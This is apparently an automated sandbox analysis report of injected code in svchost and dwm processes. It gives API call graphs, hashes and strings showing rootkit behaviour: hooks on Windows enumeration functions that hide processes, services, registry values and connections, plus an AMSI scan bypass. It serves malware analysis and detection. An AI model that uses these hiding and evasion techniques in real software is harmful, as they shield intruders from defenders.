                                                          • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction ID: 8ecaae86ea8fbf70443afad6dbac2875710af732eced0fa57f94f4f3f176b8a9
                                                          • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction Fuzzy Hash: 8FE06531B01A049BEB298F62E80D34936E5FB8AF05F48C024CD0A07360EF7D849D8B81
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2312897443.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                          • Associated: 0000000B.00000002.2311793344.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2314393434.000002A661315000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2315614620.000002A661320000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2316789237.000002A661322000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000B.00000002.2318017893.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_2a661300000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction ID: e7f8ee257ebe65d437686030ab6f09756bf5f825d091dd1b30df11599fbc06c6
                                                          • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction Fuzzy Hash: 1EE0ED71B115049BEB199B62D80D25976A5FB8AF15F488034C90A07310EF3C849D9711

                                                          Execution Graph

                                                          Execution Coverage: 1.4%
                                                          Dynamic/Decrypted Code Coverage: 100%
                                                          Signature Coverage: 0%
                                                          Total number of Nodes: 111
                                                          Total number of Limit Nodes: 17
                                                          execution_graph 22414 2baaed91bc4 22421 2baaed91724 GetProcessHeap HeapAlloc 22414->22421 22416 2baaed91bda SleepEx 22417 2baaed91724 50 API calls 22416->22417 22419 2baaed91bd3 22417->22419 22419->22416 22420 2baaed9159c StrCmpIW StrCmpW 22419->22420 22472 2baaed919b0 12 API calls 22419->22472 22420->22419 22473 2baaed91264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22421->22473 22423 2baaed9174c 22474 2baaed91000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22423->22474 22425 2baaed91754 22475 2baaed91264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22425->22475 22427 2baaed9175d 22476 2baaed91264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22427->22476 22429 2baaed91766 22477 2baaed91264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22429->22477 22431 2baaed9176f 22478 2baaed91000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22431->22478 22433 2baaed91778 22479 2baaed91000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22433->22479 22435 2baaed91781 22480 2baaed91000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22435->22480 22437 2baaed9178a RegOpenKeyExW 22438 2baaed919a2 22437->22438 22439 2baaed917bc RegOpenKeyExW 22437->22439 22438->22419 22440 2baaed917e5 22439->22440 22441 2baaed917fb RegOpenKeyExW 22439->22441 22487 2baaed912b8 16 API calls 22440->22487 22443 2baaed91836 RegOpenKeyExW 22441->22443 22444 2baaed9181f 22441->22444 22447 2baaed9185a 22443->22447 22448 2baaed91871 RegOpenKeyExW 22443->22448 22481 2baaed9104c RegQueryInfoKeyW 22444->22481 22445 2baaed917f1 RegCloseKey 22445->22441 22488 2baaed912b8 16 API calls 22447->22488 22450 2baaed91895 22448->22450 22451 2baaed918ac RegOpenKeyExW 22448->22451 22489 2baaed912b8 16 API calls 22450->22489 22455 2baaed918e7 RegOpenKeyExW 22451->22455 22456 2baaed918d0 22451->22456 22453 2baaed91867 RegCloseKey 22453->22448 22459 2baaed91922 RegOpenKeyExW 22455->22459 22460 2baaed9190b 22455->22460 22490 
2baaed912b8 16 API calls 22456->22490 22457 2baaed918a2 RegCloseKey 22457->22451 22463 2baaed91946 22459->22463 22464 2baaed9195d RegOpenKeyExW 22459->22464 22462 2baaed9104c 6 API calls 22460->22462 22461 2baaed918dd RegCloseKey 22461->22455 22468 2baaed91918 RegCloseKey 22462->22468 22465 2baaed9104c 6 API calls 22463->22465 22466 2baaed91998 RegCloseKey 22464->22466 22467 2baaed91981 22464->22467 22469 2baaed91953 RegCloseKey 22465->22469 22466->22438 22470 2baaed9104c 6 API calls 22467->22470 22468->22459 22469->22464 22471 2baaed9198e RegCloseKey 22470->22471 22471->22466 22473->22423 22474->22425 22475->22427 22476->22429 22477->22431 22478->22433 22479->22435 22480->22437 22482 2baaed911b5 RegCloseKey 22481->22482 22483 2baaed910bf 22481->22483 22482->22443 22483->22482 22484 2baaed910cf RegEnumValueW 22483->22484 22485 2baaed91125 22484->22485 22485->22482 22485->22484 22486 2baaed9114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 22485->22486 22486->22485 22487->22445 22488->22453 22489->22457 22490->22461 22491 2baaed941f9 22494 2baaed94146 _invalid_parameter_noinfo 22491->22494 22492 2baaed941b0 22493 2baaed94196 VirtualQuery 22493->22492 22493->22494 22494->22492 22494->22493 22495 2baaed941ca VirtualAlloc 22494->22495 22495->22492 22496 2baaed941fb GetLastError 22495->22496 22496->22494 22498 2baaed95c8d 22500 2baaed95c94 22498->22500 22499 2baaed95cfb 22500->22499 22501 2baaed95d77 VirtualProtect 22500->22501 22502 2baaed95da3 GetLastError 22501->22502 22503 2baaed95db1 22501->22503 22502->22503 22504 2baaed91e3c LoadLibraryA GetProcAddress 22505 2baaed91e62 SleepEx 22504->22505 22506 2baaed91e6f 22504->22506 22505->22505 22507 2baaed9f370 VirtualProtect 22508 2baaed92c80 TlsGetValue TlsGetValue TlsGetValue 22509 2baaed92cd9 22508->22509 22510 2baaed92d51 NtEnumerateValueKey 22508->22510 22509->22510 22513 2baaed92ce1 22509->22513 22511 2baaed92d4c 22510->22511 22516 2baaed92d86 22510->22516 22512 2baaed92d2d NtEnumerateValueKey 22512->22511 
22512->22513 22513->22511 22513->22512 22514 2baaed92e06 TlsSetValue TlsSetValue TlsSetValue 22513->22514 22519 2baaed93f88 22513->22519 22514->22511 22515 2baaed92da0 NtEnumerateValueKey 22515->22516 22516->22511 22516->22514 22516->22515 22518 2baaed93f88 StrCmpNIW 22516->22518 22518->22516 22520 2baaed93f95 StrCmpNIW 22519->22520 22521 2baaed93faa 22519->22521 22520->22521 22521->22513 22522 2baaed96430 22523 2baaed9643d 22522->22523 22524 2baaed96449 22523->22524 22525 2baaed9655a 22523->22525 22526 2baaed9647e 22524->22526 22530 2baaed964cd 22524->22530 22528 2baaed9663e 22525->22528 22529 2baaed96581 VirtualProtect FlushInstructionCache 22525->22529 22527 2baaed964a6 SetThreadContext 22526->22527 22527->22530 22531 2baaed9665e 22528->22531 22540 2baaed94b20 VirtualFree 22528->22540 22529->22525 22541 2baaed95530 GetCurrentProcess 22531->22541 22533 2baaed96663 22535 2baaed966b7 22533->22535 22536 2baaed96677 ResumeThread 22533->22536 22545 2baaed98070 8 API calls 2 library calls 22535->22545 22537 2baaed966ab 22536->22537 22537->22533 22539 2baaed966ff 22540->22531 22542 2baaed9554c 22541->22542 22543 2baaed95593 22542->22543 22544 2baaed95562 VirtualProtect FlushInstructionCache 22542->22544 22543->22533 22544->22542 22545->22539

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Value$Enumerate
                                                          • String ID:
                                                          • API String ID: 3520290360-0
                                                          • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction ID: c17fc73092cb7f9d9c5f7f478056b41bb10391d77da142dc39f8b91a468cbae2
                                                          • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                          • Instruction Fuzzy Hash: 2E519F3661461187E764DB1AF848A5AB3B0F788B84F704119DE8E43B94EF3ACD45CB52

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 2135414181-3572789727
                                                          • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction ID: e959e7dba3d1213401c226c67d94ee33ff2d09aaf45d9f415137de1aff4ce438
                                                          • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction Fuzzy Hash: 85716D76310E5096EB10AF31EC9869D33B4FB84B88F611215DE8E47B68EF39C954C361

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                          • API String ID: 1735320900-4225371247
                                                          • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction ID: 6fded096c6e55d1cfa3196d5c94e029645e025300846ba3a50656a32652ddacc
                                                          • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction Fuzzy Hash: 1E5199A0210A4AA5FB00EFA8FD4C7D47331B740394FA45517948D139B5EF7A8A6AC3B3

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                          • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                          • API String ID: 740688525-1880043860
                                                          • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction ID: 7fcb2a61d369904f0f6f6f5100c1a8eef03d03cad35295a1c4a8f71840c3eb15
                                                          • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction Fuzzy Hash: E351C221701B4451EE249B56AC083A933B0BB48BB0F680B259EBD47BD0FF39D955C762

                                                          Control-flow Graph

                                                          Control-flow graph (rendered graph data omitted): basic blocks at 2baaed96270-2baaed966e9 calling GetCurrentThreadId, GetThreadContext, SetThreadContext, VirtualProtect, FlushInstructionCache and ResumeThread
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: 2ff11c1be90479a1e6cf58369367b5af2ea5d024f86bdfb82a75ac5a15ce7897
                                                          • Instruction ID: 5bc781beb160d2fd45ef9ba7d8739146d33495e58988d0860e39064703ce5f79
                                                          • Opcode Fuzzy Hash: 2ff11c1be90479a1e6cf58369367b5af2ea5d024f86bdfb82a75ac5a15ce7897
                                                          • Instruction Fuzzy Hash: 7ED19F76204B88C5EA70DB1AE49835A77B0F3C8B88F204116EADD47B65EF3DC551CB15

                                                          Control-flow Graph

                                                          Control-flow graph (rendered graph data omitted): basic blocks at 2baaed91e3c-2baaed91e73 calling LoadLibraryA, GetProcAddress and SleepEx
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProcSleep
                                                          • String ID: AmsiScanBuffer$amsi.dll
                                                          • API String ID: 188063004-3248079830
                                                          • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction ID: f0304237f90cd391fe44c7f1dc9f3b070c42349d1f4a7b88577a658600086084
                                                          • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction Fuzzy Hash: 76D09E50611600E5FA087F21EC5C3693372BF64B41FF40819C58E037A0EF2E8A69C372

                                                          Control-flow Graph

                                                          Control-flow graph (rendered graph data omitted): basic blocks at 2baaed95810-2baaed95e1a calling GetCurrentThreadId, VirtualProtect and GetLastError
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: d1efe80aa896adf56c352d5c0170c98584534c44e36adba6730078e70e045cb7
                                                          • Instruction ID: d9c91d4dc7dd589e4fbddafb3cc96b078726c72af6732c899133ce16f2e79dbe
                                                          • Opcode Fuzzy Hash: d1efe80aa896adf56c352d5c0170c98584534c44e36adba6730078e70e045cb7
                                                          • Instruction Fuzzy Hash: 1502DB32219B8486E760DB55F89435AB7B0F3C4794F204525EACE87BA8EF7DC854CB21

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID:
                                                          • API String ID: 1092925422-0
                                                          • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction ID: 9fd60d6837ff686c1d078e5eb21027c135e20bcc6250a287a4ac797794eff323
                                                          • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction Fuzzy Hash: F611213660574093EB24AF25E44821AB7B0FB45B84F140526DE9D03BA4FF7ECA58C795
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2062869608.000002BAAF190000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF190000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaf190000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Protect$AllocLibraryLoad
                                                          • String ID:
                                                          • API String ID: 3316853933-0
                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction ID: 17ae07a96ee92c414d6a29946f38cb326e9a423036338e808e7df0aa7be525c4
                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction Fuzzy Hash: EB913673B0115087DB688F25D48876DBBA5F754B94F488032DF4987798DB3BD802C7A1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2183641314.000002BAAEDD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaedd0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Protect$Alloc
                                                          • String ID:
                                                          • API String ID: 2541858876-0
                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction ID: 546b4e0841fcc02726d2a51b73a6171003f6c438c4358d43e61834e2062fd656
                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction Fuzzy Hash: 5E911873B02255C7DB648F25D488B7DB3A1F754B94F6881269E8D877C8DB38D812C721
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2236561607.000002BAAEE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEE30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaee30000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Protect$Alloc
                                                          • String ID:
                                                          • API String ID: 2541858876-0
                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction ID: 554437a51a7a95f47f4d780ffa64d137e3021be52d4fc50a8420efd31f5194c9
                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction Fuzzy Hash: 39912572B0125297EB748F25D408B7DB3B1FB54B98F6C91249EA907F89DB38D812C721

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Virtual$AllocQuery
                                                          • String ID:
                                                          • API String ID: 31662377-0
                                                          • Opcode ID: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                                          • Instruction ID: 62ca7807458fb13d4273c6e45d62c98dc4af8937a2e75a1e4332839c265ae0d6
                                                          • Opcode Fuzzy Hash: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                                          • Instruction Fuzzy Hash: F4315322219A4481EA70DB55E89835E7BB4F388788F200525F5CD47F99FF3EC980CBA5

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32 ref: 000002BAAED93A35
                                                          • PathFindFileNameW.SHLWAPI ref: 000002BAAED93A44
                                                            • Part of subcall function 000002BAAED93F88: StrCmpNIW.SHLWAPI(?,?,?,000002BAAED9272F), ref: 000002BAAED93FA0
                                                            • Part of subcall function 000002BAAED93EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002BAAED93A5B), ref: 000002BAAED93EDB
                                                            • Part of subcall function 000002BAAED93EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002BAAED93A5B), ref: 000002BAAED93F0E
                                                            • Part of subcall function 000002BAAED93EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002BAAED93A5B), ref: 000002BAAED93F2E
                                                            • Part of subcall function 000002BAAED93EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002BAAED93A5B), ref: 000002BAAED93F47
                                                            • Part of subcall function 000002BAAED93EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002BAAED93A5B), ref: 000002BAAED93F68
                                                          • CreateThread.KERNELBASE ref: 000002BAAED93A8B
                                                            • Part of subcall function 000002BAAED91E74: GetCurrentThread.KERNEL32 ref: 000002BAAED91E7F
                                                            • Part of subcall function 000002BAAED91E74: CreateThread.KERNELBASE ref: 000002BAAED92043
                                                            • Part of subcall function 000002BAAED91E74: TlsAlloc.KERNEL32 ref: 000002BAAED92049
                                                            • Part of subcall function 000002BAAED91E74: TlsAlloc.KERNEL32 ref: 000002BAAED92055
                                                            • Part of subcall function 000002BAAED91E74: TlsAlloc.KERNEL32 ref: 000002BAAED92061
                                                            • Part of subcall function 000002BAAED91E74: TlsAlloc.KERNEL32 ref: 000002BAAED9206D
                                                            • Part of subcall function 000002BAAED91E74: TlsAlloc.KERNEL32 ref: 000002BAAED92079
                                                            • Part of subcall function 000002BAAED91E74: TlsAlloc.KERNEL32 ref: 000002BAAED92085
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                          • String ID:
                                                          • API String ID: 2779030803-0
                                                          • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                          • Instruction ID: 09b2e1fafa1a3fe18016e9f9a923ce9fe020257aefd4cfda65106ec6af018d25
                                                          • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                          • Instruction Fuzzy Hash: A4115A6561064192FBA0A720AD4D3AD73B1A794345FB0412994CE86AD0FF7ECD58C633

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                          • String ID:
                                                          • API String ID: 3733156554-0
                                                          • Opcode ID: 8659059d713f10fb2b36df29fda00c285aebd80b25688c8f1dc0718561e99dbb
                                                          • Instruction ID: d1a6b5c8f0e4d17bb4bdfb15b6de690a98702892b9d2224172b62c2489fba496
